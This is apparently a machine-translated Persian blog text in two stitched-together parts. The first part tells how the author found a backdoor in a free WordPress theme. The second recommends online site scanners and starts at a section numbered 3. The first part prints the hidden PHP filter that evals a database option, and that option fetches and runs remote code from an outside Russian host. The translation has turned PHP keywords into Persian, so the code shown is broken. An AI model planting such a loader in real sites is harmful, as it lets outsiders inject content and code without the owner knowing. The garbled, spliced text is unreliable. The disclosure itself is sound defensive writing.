البته اولین کاری که انجام دادم شروع به بررسی این فایل، مطالعه محتوای آن، اسکن آن با انواع آنتی ویروس ها، ده ها سرویس آنلاین ویروس یابی و غیره بود. - در پایان، چیزی پیدا نشد، همه به اتفاق آرا اظهار داشتند که پرونده کاملاً ایمن است. البته من شکم را به میزبان اعلام کردم و گفتم شما چیزی را به هم ریخته اید، اما در هر صورت از آنها خواستم گزارشی مبنی بر شناسایی کد مخرب ارائه دهند.

و این همان چیزی بود که آنها به من پاسخ دادند

من به اطلاعات این کد در گوگل رفتم و جدی فکر کردم ...

چگونه یک قطعه کد مخرب را در قالب پیدا کنیم

همانطور که مشخص است، این یک تکنیک واقعاً غیر ضروری است که به افراد علاقه مند اجازه می دهد تا داده ها را به سایت شما منتقل کنند و محتوای صفحات را بدون اطلاع شما تغییر دهند! اگر از یک قالب رایگان استفاده می کنید، پس من به شدت توصیه می کنم برای کد زیر، functions.php خود را بررسی کنید:

add_filter('the_content', '_bloginfo', 10001);
تابع _bloginfo($content)(
جهانی $post;
if(is_single() && ($co=@eval(get_option('blogoption'))) !== false)(
بازگشت $co;
) در غیر این صورت $content را برگردانید.
}

حتی با دانش بسیار سطحی من از PHP، واضح است که فیلتر خاصی در حال ایجاد است که به متغیر جهانی پست و محتوا گره خورده است، که وظیفه نمایش محتوا را فقط در صفحات پست وبلاگ دارند (شرط is_single). از قبل مشکوک است، نه؟ خوب، حالا بیایید ببینیم این کد قرار است چه چیزی را در وب سایت ما نمایش دهد.

گزینه جالب blogoption درخواست شده در پایگاه داده نیز بسیار مشکوک به نظر می رسد. ما به پایگاه داده MySQL خود می رویم و جدولی به نام wp_options را در آنجا پیدا می کنیم، اگر پیشوندها را تغییر نداده باشید، به طور پیش فرض به این شکل خواهد بود. و در آن خطی را پیدا می کنیم که مورد علاقه ما است به نام blogoption

چه زیبایی! گزینه زیر را مشاهده می کنیم

return eval(file_get_contents('http://wpru.ru/aksimet.php?id='.$post->ID.'&m=47&n'));

آن ها از یک سایت خاص (و یک سایت روسی، توجه داشته باشید) آنها محتوایی را برمی گردانند که می تواند حاوی هر چیزی باشد! هر تعداد پیوند، کدهای مخرب، متن تغییر یافته و غیره. وقتی به خود سایت دسترسی پیدا می کنید، خطای دسترسی 403 به شما می دهد که جای تعجب نیست. البته این گزینه رو هم از دیتابیس حذف کردم.

طبق اطلاعات قربانیان، محتوای دقیق مقاله شما معمولاً تنها با یک تغییر - به جای هر نقطه "، بازگردانده می شود. یک لینک باز در متن پنهان شده بود! ضمناً این گزینه در هنگام نصب خود قالب در پایگاه داده نوشته می شود و سپس کدی که این کار را با موفقیت انجام می دهد خود تخریب می شود. و من دو سال با چنین آشغالی زندگی کردم و در تمام این مدت حتی یک آنتی ویروس یا سرویس این تهدید را برای من شناسایی نکرد. صادقانه بگویم، من متوجه نشدم که آیا این ترفند تا به حال برای من کار می کند یا اینکه آیا افزونه امنیتی من این ویژگی را مسدود کرده است (یا شاید یکی از به روز رسانی های وردپرس این حفره را بسته باشد)، اما هنوز هم ناخوشایند است.

اخلاق در مورد پنیر رایگان

پیچیدگی "مترجمان" الگوهای ما (یا کسانی که آنها را در کاتالوگ خود پست می کنند) چگونه دوست دارید؟ این برای شما نیست که پیوندها را از پاورقی قطع کنید) حیف که من یادم نیست قالبم را از کجا دانلود کردم، خیلی وقت پیش بود، وگرنه قطعاً یک دوتای محبت آمیز می نوشتم. و اگر در آن زمان همان تجربه ای را داشتم که الان دارم، قطعاً از یک قالب رایگان استفاده نمی کردم یا در موارد شدید، آن را از منابع ناشناس دانلود نمی کردم!

با دانستن اینکه هیچ حفره یا لینک رمزگذاری شده ای در آن وجود ندارد، خرید یک قالب رسمی با قیمت 15 تا 20 دلار آسان تر است و در آرامش زندگی می کنید، و حتی اگر آسیب پذیری وجود داشته باشد، توسعه دهندگان قطعا به روز رسانی را منتشر می کنند که در آن این حفره ها وجود خواهد داشت. بسته ( به هر حال، آرتم اخیراً مقاله ای منتشر کرده است که در آن در مورد قالب های برتر صحبت می کند و حتی کدهای تبلیغاتی را برای تخفیف های بی رحمانه برای علاقه مندان ارائه می دهد.)

سلام دوستان IdeaFox!

من شما را نمی دانم، اما من شب ها برای خوابیدن مشکل دارم. من از مسائل امنیتی وبلاگ عذاب می کشم. من دیگه قدرت ندارم :-)

من تعداد زیادی وبلاگ در این زمینه خواندم و پلاگین های زیادی را آزمایش کردم که به حل این مشکل کمک می کند. و در نظرات آنها شروع به پرسیدن سؤالاتی در مورد موضوع محافظت از سایت کردند که باعث شد من این یادداشت را بنویسم.

فقط تصور کنید که وبلاگ دارید، مقاله می نویسید، تلاش می کنید... و احمق های شیطانی می آیند و سایت شما را می شکنند. من فکر می کنم غم و اندوه زیادی وجود خواهد داشت.

از این گذشته، هر وبلاگ نویس عادی زمان و تلاش زیادی را برای توسعه وب سایت خود صرف می کند. و برای بسیاری، وبلاگ نویسی به طور کلی به یک وسواس تبدیل می شود... اینجا و تا زمانی که این اتفاق بیفتد :-)

خوب، می فهمید که این چقدر مهم است.

بلاخره بریم سر کار :)

چند ماه پیش قبلاً یادداشتی در مورد هک نوشتم. حتما بخوانید. اما زمان زیادی از آن زمان گذشته است و من اقدامات اضافی برای تقویت دفاع همه جانبه انجام دادم.

در یادداشت های بعدی قطعاً به تفصیل به این موضوع خواهم پرداخت. (تنظیمات ISP را هم یادم می آید و می نویسم)

3. سایت را در سایر خدمات آنلاین بررسی کنید

هیچ کمبودی در چنین خدماتی وجود ندارد. من معتقدم که بسیاری از آنها کاملاً احمقانه هستند و صرفاً برای نمایش تبلیغات ایجاد شده اند.

دکتر وب

شرکت DR.Web خدمات خوبی برای بررسی آنلاین سایت ها ارائه کرده است. شخصاً، او یک بار به من کمک کرد تا یک عفونت در وبلاگ یکی از دوستانم پیدا کنم (کد شخص ثالث در فایل htaccess. وجود داشت)

چک بسیار ساده است. URL خود را وارد کنید و منتظر نتیجه تأیید باشید.

antivirus-alarm.ru

یک اسکنر وب سایت قدرتمند که از 43 پایگاه داده آنتی ویروس از شرکت های مطرح آنتی ویروس در جهان استفاده می کند.

اینجا هم همه چیز خیلی ساده است. آدرس سایت خود را وارد می کنیم و با نفس حبس منتظر نتایج اسکن می شویم.

من منتظر اینها بودم

همه چیز تمیز است، شما می توانید آرام بخوابید :-)

البته همه اینها خوب است، اما شما همچنین باید چند افزونه را نصب کنید که برای وبلاگ های وردپرس به هیچ وجه ضرری ندارند.

4. از میزبان خود بخواهید که سایت شما را بررسی کند

واقعیت این است که میزبان ها حتی بیشتر از شما نگران مسائل امنیتی هستند و اقدامات امنیتی قدرتمندی دارند. علاوه بر این، با وسایل حفاظتی تخصصی.

این خبری است که امروز برای شما دارم. در مرحله بعد، من در مورد یک افزونه بسیار قدرتمند به شما خواهم گفت که می تواند به طور قابل توجهی از وبلاگ وردپرس شما در برابر هک محافظت کند.

من قبلاً 2 ماه است که با او کار کردم و از او بسیار راضی هستم. در حالی که فهمیدم 3 بار خودمو تحریم کردم: –) خلاصه یه چیزی هست که بگم.